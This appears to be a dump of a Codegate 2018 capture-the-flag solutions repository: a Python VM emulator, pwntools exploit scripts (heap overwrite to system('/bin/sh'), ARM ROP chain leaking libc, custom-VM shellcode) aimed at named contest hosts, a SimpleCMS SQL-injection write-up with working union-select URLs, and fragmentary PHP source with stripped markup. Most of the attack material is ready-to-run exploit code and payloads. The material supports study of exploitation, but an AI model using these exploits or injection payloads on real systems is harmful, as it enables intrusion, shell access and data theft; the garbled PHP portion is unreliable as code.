self.memory.check_permission(addr + length - 1, PERM_READ): return ''.join(map(chr,res)), length else: print 'test2' self.terminjte("[VM] Can't read memory") def read_memory_tri(self, addr, count): if not count: return [] if self.memory.check_permission(addr, PERM_READ) and self.memory.check_permission(addr + count*3 - 1, PERM_READ): res = [] for i in range(count): tri = 0 tri |= self.memory[addr + i*3] tri |= self.memory[addr + i*3 + 1] << 14 tri |= self.memory[addr + i*3 + 2] << 7 res.append(tri) return res else: print 'test' self.terminate("[VM] Can't read memory") def write_memory(self, addr, data, length): if not length: return if self.memory.check_permission(addr, PERM_WRITE) and self.memory.check_permission(addr + length - 1, PERM_WRITE): for offset in range(length): self.memory[addr + offset] = data[offset] & 0b1111111 else: self.terminate("[VM] Can't write memory") def write_memory_tri(self,addr,data_list, count): if not count: return if self.memory.check_permission(addr, PERM_WRITE) and self.memory.check_permission(addr + count*3 - 1, PERM_WRITE): for i in range(count): self.memory[addr + i*3] = (data_list[i] & 0b000000000000001111111) self.memory[addr + i*3 + 1] = (data_list[i] & 0b111111100000000000000) >> 14 self.memory[addr + i*3 + 2] = (data_list[i] & 0b000000011111110000000) >> 7 else: self.terminate("[VM] Can't write memory") def op_x0(self, op_type, opers): print '(%04x)' % self.register.get_register('pc') if op_type == TYPE_R: print '[x0] ldr r%d, [r%d]' % (opers[0], opers[1]) src = self.register.get_register(opers[1]) dst = opers[0] data = self.read_memory_tri(src, 1)[0] self.register.set_register(dst, data) else: self.terminate("[VM] Invalid instruction") def op_x1(self, op_type, opers): print '(%04x)' % self.register.get_register('pc') if op_type == TYPE_R: print '[x1] or_1_2 r%d, [r%d]_0' % (opers[0], opers[1]) src = self.register.get_register(opers[1]) dst = opers[0] ch = self.read_memory(src, 1)[0] org_dst = self.register.get_register(dst) self.register.set_register(dst, (org_dst & 0b111111111111110000000) | ch) else: self.terminate("[VM] Invalid instruction") def op_x2(self, op_type, opers): print '(%04x)' % self.register.get_register('pc') if op_type == TYPE_R: print '[x2] str r%d, [r%d]' % (opers[0], opers[1]) src = self.register.get_register(opers[0]) dst = self.register.get_register(opers[1]) self.write_memory_tri(dst, [src], 1) else: self.terminate("[VM] Invalid instruction") def op_x3(self, op_type, opers): print '(%04x)' % self.register.get_register('pc') if op_type == TYPE_R: print '[x3] str_0 r%d, [r%d]' % (opers[0], opers[1]) src = self.register.get_register(opers[0]) dst = self.register.get_register(opers[1]) self.write_memory(dst, [src & 0b1111111], 1) else: self.terminate("[VM] Invalid instruction") def op_x4(self, op_type, opers): print '(%04x)' % self.register.get_register('pc') if op_type == TYPE_R: print '[x4] mov r%d, r%d' % (opers[0], opers[1]) src = self.register.get_register(opers[1]) dst = opers[0] self.register.set_register(dst, src) elif op_type == TYPE_I: print '[x4] mov r%d, %d' % (opers[0], opers[1]) src = opers[1] dst = opers[0] #print '[x4] mov r%d, %d' % (opers[0], opers[1]) self.register.set_register(dst, src) else: self.terminate("[VM] Invalid instruction") def op_x5(self, op_type, opers): print '(%04x)' % self.register.get_register('pc') if op_type == TYPE_R: print '[x5] swap r%d, r%d' % (opers[0], opers[1]) src = opers[1] dst = opers[0] org_src = self.register.get_register(src) org_dst = self.register.get_register(dst) self.register.set_register(src, org_dst) self.register.set_register(dst, org_src) else: self.terminate("[VM] Invalid instruction") def op_x6(self, op_type, opers, is_ins=True): if is_ins: print '(%04x)' % self.register.get_register('pc') if op_type == TYPE_R: if is_ins: print '[x6] push r%d' % (opers[0]) src = self.register.get_register(opers[0]) sp = self.register.get_register('sp') self.register.set_register('sp', sp-3) self.write_memory_tri(sp-3, [src], 1) elif op_type == TYPE_I: if is_ins: print '[x6] push %d' % (opers[1]) src = opers[1] sp = self.register.get_register('sp') self.register.set_register('sp', sp-3) self.write_memory_tri(sp-3, [src], 1) else: self.terminate("[VM] Invalid instruction") def op_x7(self, op_type, opers): print '(%04x)' % self.register.get_register('pc') if op_type == TYPE_R: if opers[0] == 13: print '[x7] ret\n\n' else: print '[x7] pop r%d' % (opers[0]) dst = opers[0] sp = self.register.get_register('sp') value = self.read_memory_tri(sp, 1)[0] self.register.set_register(dst, value) self.register.set_register('sp', sp+3) else: self.terminate("[VM] Invalid instruction") def op_x9(self, op_type, opers): print '(%04x)' % self.register.get_register('pc') if op_type == TYPE_R: print '[x9] add r%d, r%d' % (opers[0], opers[1]) src = self.register.get_register(opers[1]) dst = opers[0] org_dst = self.register.get_register(dst) self.register.set_register(dst, (org_dst + src) & 0b111111111111111111111) elif op_type == TYPE_I: print '[x9] add r%d, %d' % (opers[0], opers[1]) src = opers[1] dst = opers[0] org_dst = self.register.get_register(dst) self.register.set_register(dst, (org_dst + src) & 0b111111111111111111111) else: self.terminate("[VM] Invalid instruction") def op_x10(self, op_type, opers): print '(%04x)' % self.register.get_register('pc') if op_type == TYPE_R: print '[x10] or_0 r%d, r%d' % (opers[0], opers[1]) src = self.register.get_register(opers[1]) & 0b1111111 dst = opers[0] org_dst = self.register.get_register(dst) self.register.set_register(dst, (org_dst & 0b111111111111110000000) | ((org_dst + src) & 0b1111111)) elif op_type == TYPE_I: print '[x10] or_0 r%d, %d' % (opers[0], opers[1]) src = opers[1] dst = opers[0] org_dst = self.register.get_register(dst) self.register.set_register(dst, (org_dst & 0b111111111111110000000) | ((org_dst + src) & 0b1111111)) else: self.terminate("[VM] Invalid instruction") def op_x11(self, op_type, opers): print '(%04x)' % self.register.get_register('pc') if op_type == TYPE_R: print '[x11] sub r%d, r%d' % (opers[0], opers[1]) src = self.register.get_register(opers[1]) dst = opers[0] org_dst = self.register.get_register(dst) self.register.set_register(dst, (org_dst - src) & 0b111111111111111111111) elif op_type == TYPE_I: print '[x11] sub r%d, %d' % (opers[0], opers[1]) src = opers[1] dst = opers[0] org_dst = self.register.get_register(dst) self.register.set_register(dst, (org_dst - src) & 0b111111111111111111111) else: self.terminate("[VM] Invalid instruction") def op_x12(self, op_type, opers): print '(%04x)' % self.register.get_register('pc') if op_type == TYPE_R: print '[x12] sub_0 r%d, r%d' % (opers[0], opers[1]) src = self.register.get_register(opers[1]) & 0b1111111 dst = opers[0] org_dst = self.register.get_register(dst) self.register.set_register(dst, (org_dst & 0b111111111111110000000) | ((org_dst - src) & 0b1111111)) elif op_type == TYPE_I: print '[x12] sub_0 r%d, %d' % (opers[0], opers[1]) src = opers[1] dst = opers[0] org_dst = self.register.get_register(dst) self.register.set_register(dst, (org_dst & 0b111111111111110000000) | ((org_dst - src) & 0b1111111)) else: self.terminate("[VM] Invalid instruction") def op_x13(self, op_type, opers): print '(%04x)' % self.register.get_register('pc') if op_type == TYPE_R: print '[x13] right_shift r%d, r%d' % (opers[0], opers[1]) dst = opers[0] value = self.register.get_register(opers[1]) org_dst = self.register.get_register(dst) self.register.set_register(dst, org_dst >> value) elif op_type == TYPE_I: print '[x13] right_shift r%d, %d' % (opers[0], opers[1]) dst = opers[0] value = opers[1] org_dst = self.register.get_register(dst) self.register.set_register(dst, org_dst >> value) else: self.terminate("[VM] Invalid instruction") def op_x14(self, op_type, opers): print '(%04x)' % self.register.get_register('pc') if op_type == TYPE_R: print '[x14] left_shift r%d, r%d' % (opers[0], opers[1]) dst = opers[0] value = self.register.get_register(opers[1]) org_dst = self.register.get_register(dst) self.register.set_register(dst, (org_dst << value) & 0b111111111111111111111) elif op_type == TYPE_I: print '[x14] left_shift r%d, %d' % (opers[0], opers[1]) dst = opers[0] value = opers[1] org_dst = self.register.get_register(dst) self.register.set_register(dst, (org_dst << value) & 0b111111111111111111111) else: self.terminate("[VM] Invalid instruction") def op_x15(self, op_type, opers): print '(%04x)' % self.register.get_register('pc') if op_type == TYPE_R: print '[x15] mul r%d, r%d' % (opers[0], opers[1]) dst = opers[0] value = self.register.get_register(opers[1]) org_dst = self.register.get_register(dst) self.register.set_register(dst, ((org_dst * value) & 0b111111111111111111111)) elif op_type == TYPE_I: print '[x15] mul r%d, %d' % (opers[0], opers[1]) dst = opers[0] value = opers[1] org_dst = self.register.get_register(dst) self.register.set_register(dst, ((org_dst * value) & 0b111111111111111111111)) else: self.terminate("[VM] Invalid instruction") def op_x16(self, op_type, opers): print '(%04x)' % self.register.get_register('pc') if op_type == TYPE_R: print '[x16] div r%d, r%d' % (opers[0], opers[1]) dst = opers[0] value = self.register.get_register(opers[1]) if value == 0: self.terminate("[VM] Divide by zero") org_dst = self.register.get_register(dst) self.register.set_register(dst, (int(org_dst / value) & 0b111111111111111111111)) elif op_type == TYPE_I: print '[x16] div r%d, %d' % (opers[0], opers[1]) dst = opers[0] value = opers[1] if value == 0: self.terminate("[VM] Divide by zero") org_dst = self.register.get_register(dst) self.register.set_register(dst, (int(org_dst / value) & 0b111111111111111111111)) else: self.terminate("[VM] Invalid instruction") def op_x17(self, op_type, opers): print '(%04x)' % self.register.get_register('pc') if op_type == TYPE_R: print '[x17] inc r%d' % (opers[0]) src = opers[0] value = self.register.get_register(src) value += 1 self.register.set_register(src, value) else: self.terminate("[VM] Invalid instruction") def op_x18(self, op_type, opers): print '(%04x)' % self.register.get_register('pc') if op_type == TYPE_R: print '[x18] dec r%d' % (opers[0]) src = opers[0] value = self.register.get_register(src) value -= 1 self.register.set_register(src, value) else: self.terminate("[VM] Invalid instruction") def op_x19(self, op_type, opers): print '(%04x)' % self.register.get_register('pc') if op_type == TYPE_R: print '[x19] and r%d, r%d' % (opers[0], opers[1]) src = self.register.get_register(opers[1]) dst = opers[0] org_dst = self.register.get_register(dst) self.register.set_register(dst, (org_dst & src) & 0b111111111111111111111) elif op_type == TYPE_I: print '[x19] and r%d, %d' % (opers[0], opers[1]) src = opers[1] dst = opers[0] org_dst = self.register.get_register(dst) self.register.set_register(dst, (org_dst & src) & 0b111111111111111111111) else: self.terminate("[VM] Invalid instruction") def op_x20(self, op_type, opers): print '(%04x)' % self.register.get_register('pc') if op_type == TYPE_R: print '[x20] or r%d, r%d' % (opers[0], opers[1]) src = self.register.get_register(opers[1]) dst = opers[0] org_dst = self.register.get_register(dst) self.register.set_register(dst, (org_dst | src) & 0b111111111111111111111) elif op_type == TYPE_I: print '[x20] or r%d, %d' % (opers[0], opers[1]) src = opers[1] dst = opers[0] org_dst = self.register.get_register(dst) self.register.set_register(dst, (org_dst | src) & 0b111111111111111111111) else: self.terminate("[VM] Invalid instruction") def op_x21(self, op_type, opers): print '(%04x)' % self.register.get_register('pc') if op_type == TYPE_R: print '[x21] xor r%d, r%d' % (opers[0], opers[1]) src = self.register.get_register(opers[1]) dst = opers[0] org_dst = self.register.get_register(dst) self.register.set_register(dst, (org_dst ^ src) & 0b111111111111111111111) elif op_type == TYPE_I: print '[x21] xor r%d, %d' % (opers[0], opers[1]) src = opers[1] dst = opers[0] org_dst = self.register.get_register(dst) self.register.set_register(dst, (org_dst ^ src) & 0b111111111111111111111) else: self.terminate("[VM] Invalid instruction") def op_x22(self, op_type, opers): print '(%04x)' % self.register.get_register('pc') if op_type == TYPE_R: print '[x22] mod r%d, r%d' % (opers[0], opers[1]) src = self.register.get_register(opers[1]) dst = opers[0] org_dst = self.register.get_register(dst) self.register.set_register(dst, (org_dst % src) & 0b111111111111111111111) elif op_type == TYPE_I: print '[x22] mod r%d, %d' % (opers[0], opers[1]) src = opers[1] dst = opers[0] org_dst = self.register.get_register(dst) self.register.set_register(dst, (org_dst % src) & 0b111111111111111111111) else: self.terminate("[VM] Invalid instruction") def op_x23(self, op_type, opers): print '(%04x)' % self.register.get_register('pc') if op_type == TYPE_R: print '[x23] test r%d, r%d' % (opers[0], opers[1]) src = self.register.get_register(opers[1]) dst = self.register.get_register(opers[0]) tmp = dst - src if tmp == 0: eflags = FLAG_ZF elif tmp < 0: eflags = FLAG_NF else: eflags = 0b0000 self.register.set_register('eflags', eflags & 0b111111111111111111111) elif op_type == TYPE_I: print '[x23] test r%d, %d' % (opers[0], opers[1]) src = opers[1] dst = self.register.get_register(opers[0]) tmp = dst - src if tmp == 0: eflags = FLAG_ZF elif tmp < 0: eflags = FLAG_NF else: eflags = 0b0000 self.register.set_register('eflags', eflags & 0b111111111111111111111) else: self.terminate("[VM] Invalid instruction") def op_x24(self, op_type, opers): print '(%04x)' % self.register.get_register('pc') if op_type == TYPE_R: print '[x24] test_0 r%d, r%d' % (opers[0], opers[1]) src = self.register.get_register(opers[1]) & 0b000000000000001111111 dst = self.register.get_register(opers[0]) & 0b000000000000001111111 tmp = dst - src if tmp == 0: eflags = FLAG_ZF elif tmp < 0: eflags = FLAG_NF else: eflags = 0b0000 self.register.set_register('eflags', eflags & 0b111111111111111111111) elif op_type == TYPE_I: print '[x24] test_0 r%d, %d' % (opers[0], opers[1]) src = opers[1] & 0b000000000000001111111 dst = self.register.get_register(opers[0]) & 0b000000000000001111111 tmp = dst - src if tmp == 0: eflags = FLAG_ZF elif tmp < 0: eflags = FLAG_NF else: eflags = 0b0000 self.register.set_register('eflags', eflags & 0b111111111111111111111) else: self.terminate("[VM] Invalid instruction") def op_x25(self, op_type, opers): print '(%04x)' % self.register.get_register('pc') if op_type == TYPE_R: print '[x25] ja r%d, r%d' % (opers[0], opers[1]) eflags = self.register.get_register('eflags') base = self.register.get_register(opers[0]) offset = self.register.get_register(opers[1]) if not (eflags & FLAG_NF) and not (eflags & FLAG_ZF): print ' => %#x\n\n' % (base+offset) self.register.set_register('pc', (base + offset) & 0b111111111111111111111) elif op_type == TYPE_I: print '[x25] ja r%d, %d' % (opers[0], opers[1]) eflags = self.register.get_register('eflags') base = self.register.get_register(opers[0]) offset = opers[1] if not (eflags & FLAG_NF) and not (eflags & FLAG_ZF): print ' => %#x\n\n' % (base+offset) self.register.set_register('pc', (base + offset) & 0b111111111111111111111) else: self.terminate("[VM] Invalid instruction") def op_x26(self, op_type, opers): print '(%04x)' % self.register.get_register('pc') if op_type == TYPE_R: print '[x26] jb r%d, r%d' % (opers[0], opers[1]) eflags = self.register.get_register('eflags') base = self.register.get_register(opers[0]) offset = self.register.get_register(opers[1]) if (eflags & FLAG_NF) and not (eflags & FLAG_ZF): print ' => %#x\n\n' % (base+offset) self.register.set_register('pc', (base + offset) & 0b111111111111111111111) elif op_type == TYPE_I: print '[x26] jb r%d, %d' % (opers[0], opers[1]) eflags = self.register.get_register('eflags') base = self.register.get_register(opers[0]) offset = opers[1] if (eflags & FLAG_NF) and not (eflags & FLAG_ZF): print ' => %#x\n\n' % (base+offset) self.register.set_register('pc', (base + offset) & 0b111111111111111111111) else: self.terminate("[VM] Invalid instruction") def op_x27(self, op_type, opers): print '(%04x)' % self.register.get_register('pc') if op_type == TYPE_R: print '[x27] je r%d, r%d' % (opers[0], opers[1]) eflags = self.register.get_register('eflags') base = self.register.get_register(opers[0]) offset = self.register.get_register(opers[1]) if (eflags & FLAG_ZF): self.register.set_register('pc', (base + offset) & 0b111111111111111111111) print ' => %#x\n\n' % (base+offset) elif op_type == TYPE_I: print '[x27] je r%d, %d' % (opers[0], opers[1]) eflags = self.register.get_register('eflags') base = self.register.get_register(opers[0]) offset = opers[1] if (eflags & FLAG_ZF): self.register.set_register('pc', (base + offset) & 0b111111111111111111111) print ' => %#x\n\n' % (base+offset) else: self.terminate("[VM] Invalid instruction") def op_x28(self, op_type, opers): print '(%04x)' % self.register.get_register('pc') if op_type == TYPE_R: print '[x28] jne r%d, r%d' % (opers[0], opers[1]) eflags = self.register.get_register('eflags') base = self.register.get_register(opers[0]) offset = self.register.get_register(opers[1]) if not (eflags & FLAG_ZF): self.register.set_register('pc', (base + offset) & 0b111111111111111111111) print ' => %#x\n\n' % (base+offset) elif op_type == TYPE_I: print '[x28] jne r%d, %d' % (opers[0], opers[1]) eflags = self.register.get_register('eflags') base = self.register.get_register(opers[0]) offset = opers[1] if not (eflags & FLAG_ZF): self.register.set_register('pc', (base + offset) & 0b111111111111111111111) print ' => %#x\n\n' % (base+offset) else: self.terminate("[VM] Invalid instruction") def op_x29(self, op_type, opers): print '(%04x)' % self.register.get_register('pc') if op_type == TYPE_R: print '[x29] j r%d, r%d' % (opers[0], opers[1]) base = self.register.get_register(opers[0]) offset = self.register.get_register(opers[1]) print ' => %#x\n\n' % (base+offset) self.register.set_register('pc', (base + offset) & 0b111111111111111111111) elif op_type == TYPE_I: print '[x29] j r%d, %d' % (opers[0], opers[1]) base = self.register.get_register(opers[0]) offset = opers[1] print ' => %#x\n\n' % (base+offset) self.register.set_register('pc', (base + offset) & 0b111111111111111111111) else: self.terminate("[VM] Invalid instruction") def op_x30(self, op_type, opers): print '(%04x)' % self.register.get_register('pc') if op_type == TYPE_R: print '[x30] call r%d, r%d' % (opers[0], opers[1]) base = self.register.get_register(opers[0]) offset = self.register.get_register(opers[1]) print ' => %#x\n\n' % (base+offset) ret_addr = self.register.get_register('pc') self.op_x6(1, [0, ret_addr], is_ins=False) self.register.set_register('pc', (base + offset) & 0b111111111111111111111) elif op_type == TYPE_I: print '[x30] call r%d, %d' % (opers[0], opers[1]) base = self.register.get_register(opers[0]) offset = opers[1] ret_addr = self.register.get_register('pc') print ' => %#x\n\n' % (base+offset) self.op_x6(1, [0, ret_addr], is_ins=False) self.register.set_register('pc', (base + offset) & 0b111111111111111111111) else: self.terminate("[VM] Invalid instruction") def op_x8(self, op_type, opers): print '(%04x)' % self.register.get_register('pc') syscall_num = self.register.get_register('r0') print '[x8] syscall %d' % (syscall_num) if 0 <= syscall_num < len(self.syscall_table): syscall = self.syscall_table[syscall_num] syscall() else: self.terminate("[VM] Invalid syscall") def sys_s0(self): print ' [s0] exit' exit(0) def sys_s1(self): filename, filename_len = self.read_memory_str(self.register.get_register('r1')) print 'r1 %#x' % self.register.get_register('r1') print filename fd = self.filesystem.open(filename) if fd != -1: self.pipeline.append(fd) print 'fd %d' % (len(self.pipeline) - 1) self.register.set_register('r0', len(self.pipeline) - 1) else: print 2 self.pipeline.append(fd) self.register.set_register('r0', 0b111111111111111111111) #print ' [s1] open($#x:)=%d' % (self.register.get_register('r1'), fd) print 1 def sys_s2(self): fd = self.register.get_register('r1') buf = self.register.get_register('r2') size = self.register.get_register('r3') print " [s2] write(%d, %#x, %d)" % (fd, buf, size) data = self.read_memory(buf, size) if 0 <= fd < len(self.pipeline): self.pipeline[fd].write(data) self.register.set_register('r0', size) else: self.register.set_register('r0', 0) def sys_s3(self): fd = self.register.get_register('r1') buf = self.register.get_register('r2') size = self.register.get_register('r3') if 0 <= fd < len(self.pipeline): data = map(ord, self.pipeline[fd].read(size)) print data self.write_memory(buf, data, len(data)) print self.read_memory(buf, 10) print data, '%#x'%buf self.register.set_register('r0', len(data) & 0b111111111111111111111) else: self.register.set_register('r0', 0) print " [s3] read(%d, %#x, %d)" % (fd, buf, size) def sys_s4(self): res_ptr = self.register.get_register('r1') perm = self.register.get_register('r2') addr = self.memory.allocate(perm) if addr != -1: self.write_memory_tri(res_ptr, [addr], 1) self.register.set_register('r0', 1) else: self.register.set_register('r0', 0) print " [s4] mmap(&%#x, %#x) = %#x" % (res_ptr, perm, addr) def sys_s5(self): data = random.randrange(0, 2**21-1) self.register.set_register('r0', data) print " [s5] random() = %#x" % (data) def terminate(self, msg): print msg exit(-1) ================================================ FILE: 2018/codegate-quals-2018/pwn/gamebox1/memo.txt ================================================ r0 = open("./flag") read(r0, 0xf4000, 0x20) write(1, 0xf4000, 0x20) ================================================ FILE: 2018/codegate-quals-2018/pwn/gamebox1/solve.py ================================================ #!/usr/bin/env python2.7 # -*- coding: utf-8 -*- __author__ = "luckasdf0" from pwn import * import struct from hashlib import sha1 io = remote("13.124.182.123", 8888) def u21(s): p0 = int(s[0]) p1 = int(s[1]) p2 = int(s[2]) d0 = p0 & 0b1111111 d1 = p2 & 0b1111111 d2 = p1 & 0b1111111 num = d0 | ((d1<<7)&0b11111110000000) | ((d2<<14)&0b111111100000000000000) return num def p21(num): num = num & 0b111111111111111111111 p0 = num & 0b1111111 p1 = ((num & 0b111111100000000000000)>>14)&0b111111111111111111111 p2 = ((num & 0b11111110000000)>>7)&0b111111111111111111111 return chr(p0)+chr(p1)+chr(p2) def movI(reg, val): ins = ((0x4&0b11111)<<10) # OPCODE 4 ins = ins| 0b1000000000 # TYPE_I ins = (ins | ((reg&0b0111)<<4) | ((reg&0b1000)>>3)<<8) print 'AAAAAAAAAAAA' + bin(ins) #return p16(ins) + p21(val) return struct.pack('>H', ins) + p21(val) def syscall(): ins = ((0x8&0b11111)<<10) # OPCODE 4 print bin(ins) ins = ins & 0b111110000000000 # TYPE_R print bin(ins) print bin(ins) return struct.pack('>H', ins) def inc(reg): ins = ((17&0b11111)<<10) # OPCODE 4 print bin(ins) ins = ins & 0b111110000000000 # TYPE_I ins = (ins | ((reg&0b0111)<<4) | ((reg&0b1000)>>3)<<8) return struct.pack('>H', ins) def dec(reg): ins = ((18&0b11111)<<10) # OPCODE 4 print bin(ins) ins = ins & 0b111110000000000 # TYPE_I ins = (ins | ((reg&0b0111)<<4) | ((reg&0b1000)>>3)<<8) return struct.pack('>H', ins) def check(): io.recvuntil('prefix : ') start = io.recv(6) log.info("%s"%start) i = 0 while True: i+=1 if sha1(start+str(i)).hexdigest().endswith('000000'): io.sendline(start+str(i)) break check() shellcode = '' shellcode += movI(0, 1) shellcode += movI(1, 0xf5f9e+52) shellcode += syscall() shellcode += inc(0) shellcode += movI(1, 2) shellcode += movI(2, 0xf5000) shellcode += movI(3, 0x20) shellcode += syscall() shellcode += movI(0, 2) shellcode += dec(1) shellcode += syscall() shellcode += syscall() payload = '' payload += shellcode.ljust(52, '0') payload += 'flag\0' #payload += p21(0b111111111111111111111) * 19 payload += p21(74565) payload += p21(0xbeef) payload += p21(0xf5f9e) io.recvuntil("name>") io.sendline(payload) io.interactive() ================================================ FILE: 2018/codegate-quals-2018/pwn/marimo/solve.py ================================================ #!/usr/bin/env python2.7 # -*- coding: utf-8 -*- __author__ = "luckasdf0" from pwn import * import time io = remote("ch41l3ng3s.codegate.kr", 3333) # gdb def attach(addr): gdb.attach(io, execute='b *0x%x' % (addr)) def sell(idx): io.recvuntil('>> ') io.sendline('S') io.recvuntil('[?] Which marimo do you want to sell? (number)') io.sendline(str(idx)) io.recvuntil("[S]ell / [R]un away ?") io.sendline('S') def buy(size, name, profile): io.recvuntil('>> ') io.sendline('B') io.recvuntil('[?] What size do you want for Marimo? (cm)') io.sendline(str(size)) io.recvuntil('[P]ay / [R]un away ?') io.sendline('P') io.recvuntil("What's your new marimo's name?") io.sendline(name) io.recvuntil("s profile.") io.sendline(profile) def view(idx, modify=False, profile=None): io.recvuntil('>> ') io.sendline('V') io.recvuntil('Select number or [B]ack') io.sendline(str(idx)) if modify: while True: io.recvuntil('size : ') size = int(io.recvline()[:-1]) print 'size %d'%size io.recvuntil('M]odify / [B]ack') io.sendline('M') if size >= len(profile)+2: io.recvuntil('profile') io.sendline(profile) io.recvuntil('M]odify / [B]ack') io.sendline('B') break else: io.recvuntil('profile') io.sendline('A'*size) else: io.sendline('B') def free_marimo(name, profile): io.recvuntil('>> ') io.sendline('show me the marimo') io.recvuntil("What's your new marimo's name? (0x10)") io.sendline(name) io.recvuntil("profile.") io.sendline(profile) free_marimo('A'*0x10, 'B'*0x10) free_marimo('A'*0x10, 'B'*0x10) payload = '' payload += 'A'*0x28 payload += p64(0x31) payload += p64(0xdeadbeefdeadbeef) payload += p64(0x603040) payload += p64(0x603040) payload += '\x21' view(0, modify=True, profile=payload) view(1) io.recvuntil("name : ") libc_strcmp = u64(io.recv(6).ljust(0x8, '\x00')) libc_base = libc_strcmp-0x9f570 libc_system = libc_base+0x45390 print '0x%016x' % libc_base view(1, modify=True, profile=p64(libc_system)[:-2]) io.recvuntil('>> ') io.sendline('/bin/sh\x00') io.interactive() ================================================ FILE: 2018/codegate-quals-2018/pwn/melong/solve.py ================================================ #!/usr/bin/env python2.7 # -*- coding: utf-8 -*- __author__ = "luckasdf0" from pwn import * io = remote("ch41l3ng3s.codegate.kr", 1199) # gdb def attach(addr): gdb.attach(io, execute='b *0x%x' % (addr)) def check(height, weight): io.recvuntil('6. Out of the gym') io.sendline('1') io.recvuntil('Your height(meters) :') io.sendline(str(height)) io.recvuntil('Your weight(kilograms) :') io.sendline(str(weight)) def exercise(): io.recvuntil('6. Out of the gym') io.sendline('2') def register(size): io.recvuntil('6. Out of the gym') io.sendline('3') io.recvuntil('How long do you want to take personal training?') io.sendline(str(size)) def write_diary(payload): io.recvuntil('6. Out of the gym') io.sendline('4') #raw_input() io.sendline(payload) check(0.4841229182759271, 8.1) check(0.4841229182759271, 8.1) exercise() register(0x1ff) payload = '' payload += 'A'*0x50 payload += p32(0xcafebabe) payload += p32(0x11bbc) # pop {r0, pc} payload += p32(0x23020) # got_malloc payload += p32(0x104A8) # plt_puts payload += p32(0xdeadbeef)*7 payload += p32(0x104fc) payload = payload.ljust(0xff, '\x00') write_diary(payload) io.recvuntil('6. Out of the gym') io.sendline('6') io.recvuntil("Type the number:See you again :)\n") libc_malloc = u32(io.recv(4)) libc_base = libc_malloc-0x728E4 print 'libc_malloc %#x' % libc_malloc check(0.4841229182759271, 8.1) check(0.4841229182759271, 8.1) exercise() register(0x1ff) payload = '' payload += 'A'*0x50 payload += p32(0xcafebabe) payload += p32(0x11bbc) # pop {r0, pc} payload += p32(libc_base+0x12121C) # libc_bin_sh payload += p32(libc_base+0x38634) # libc_system payload += p32(0xdeadbeef)*7 payload += p32(0xcafebabe) payload = payload.ljust(0xff, '\x00') write_diary(payload) io.recvuntil('6. Out of the gym') io.sendline('6') io.interactive() ================================================ FILE: 2018/codegate-quals-2018/web/SimpleCMS/index.md ================================================ This chanllage is a typical CMS source code audit. Accordind to source code, flag is in ``{table_prefix}flag.{blind_column}4``, but ``{table_prefix}`` and ``{blind_column}`` is unknown. This cms don't use pre-compiled technology, but use addslash and blacklist as below. ```php $value) { if(is_array($value)) { $array[$key] = escape_str($value); } else { $array[$key] = filter($value); } } } else { $array = filter($array); } return $array; } function filter($str){ global $filter_str; foreach ($filter_str as $value) { if(stripos($str, $value) !== false){ die('are you hacker?'); } } return addslashes($str); } $_GET = escape_str($_GET); $_POST = escape_str($_POST); $_COOKIE = escape_str($_COOKIE); $_REQUEST = escape_str($_REQUEST); ?> ``` After looking at source code, I found the following code is weird, seems we can inject via ``search``. ```php function action_search(){ $column = Context::get('col'); $search = Context::get('search'); $type = strtolower(Context::get('type')); $operator = 'or'; if($type === '1'){ $operator = 'or'; } else if($type === '2'){ $operator = 'and'; } if(preg_match('/[\<\>\'\"\\\'\\\"\%\=\(\)\/\^\*\-`;,.@0-9\s!\?\[\]\+_&$]/is', $column)){ $column = 'title'; } $query = get_search_query($column, $search, $operator); $result = DB::fetch_multi_row('board', '', '', '0, 10','date desc', $query); include(CMS_SKIN_PATH . 'board.php'); } ``` In this code, ``\n`` will trigger a syntax error. ``` http://13.125.3.183/index.php?act=board&mid=search&col=title%23&type=1&search=test%0a)%23 ``` Then we try to use ``mysql`` db to get ``{table_prefix}``. ``` http://13.125.3.183/index.php?act=board&mid=search&col=title%23&type=1&search=test%0a)%3C0%20union%20select%201,(select%20table_name%20from%20mysql.innodb_table_stats%20limit%202,1),3,4,5%23 ``` At last, we can use ``join`` to get flag. ``` http://13.125.3.183/index.php?act=board&mid=search&col=title%23&type=1&search=test%0A)%3C0%20union%20(select%201,t.*%20from%20mysql.user%20join%2041786c497656426a6149_flag%20t)%23 ``` ================================================ FILE: 2018/codegate-quals-2018/web/rbSql/dbconn.php ================================================ $pointer){ if($rawData[$pointer] == STR){ // str $pointer++; $length = ord($rawData[$pointer]); $pointer++; $parsed[$idx] = substr($rawData,$pointer,$length); $pointer += $length; } elseif($rawData[$pointer] == ARR){ // array $pointer++; $arrayCount = ord($rawData[$pointer]); $pointer++; for($i=0;$i<$arrayCount;$i++){ if(substr($rawData,$pointer,1) == ARR){ $pointer++; $arrayCount2 = ord($rawData[$pointer]); $pointer++; for($j=0;$j<$arrayCount2;$j++){ $pointer++; $length = ord($rawData[$pointer]); $pointer++; $parsed[$idx][$i][$j] = substr($rawData,$pointer,$length); $pointer += $length; } } else{ $pointer++; $length = ord(substr($rawData,$pointer,1)); $pointer++; $parsed[$idx][$i] = substr($rawData,$pointer,$length); $pointer += $length; } } } $idx++; if($idx > 2048) break; } return $parsed[0]; } function rbPack($data){ $rawData = ""; if(is_string($data)){ $rawData .= STR . chr(strlen($data)) . $data; } elseif(is_array($data)){ $rawData .= ARR . chr(count($data)); for($idx=0;$idx

Login

ID
PW

Join

ID
MAIL
PW

location.href='./';"); } else error("login fail"); } elseif($page == "join_chk"){ $uid = $_POST['uid']; $umail = $_POST['umail']; $upw = $_POST['upw']; if(($uid) && ($upw) && ($umail)){ if(strlen($uid) < 3) error("id too short"); if(strlen($uid) > 16) error("id too long"); if(!ctype_alnum($uid)) error("id must be alnum!"); if(strlen($umail) > 256) error("email too long"); include "dbconn.php"; $upw = md5($upw); $uip = $_SERVER['REMOTE_ADDR']; if(rbGetPath("member_".$uid)) error("id already existed"); $ret = rbSql("create","member_".$uid,["id","mail","pw","ip","lvl"]); if(is_string($ret)) error($ret); $ret = rbSql("insert","member_".$uid,[$uid,$umail,$upw,$uip,"1"]); if(is_string($ret)) error($ret); exit(""); } else error("join fail"); } elseif($page == "photo"){ ?>

Photo

Music Video

uid : {$_SESSION['uid']}

level : "; if($_SESSION['lvl'] == 1) echo "Guest"; elseif($_SESSION['lvl'] == 2) echo "Admin"; echo "

"; include "dbconn.php"; $ret = rbSql("select","member_".$_SESSION['uid'],["id",$_SESSION['uid']]); echo "

mail : {$ret['1']}

ip : {$ret['3']}

"; if($_SESSION['lvl'] === "2"){ echo "

Flag :

"; include "/flag"; rbSql("delete","member_".$_SESSION['uid'],["id",$_SESSION['uid']]); } } elseif($page == "logout"){ session_destroy(); exit(""); } else{ ?>

ㅋrystal :/

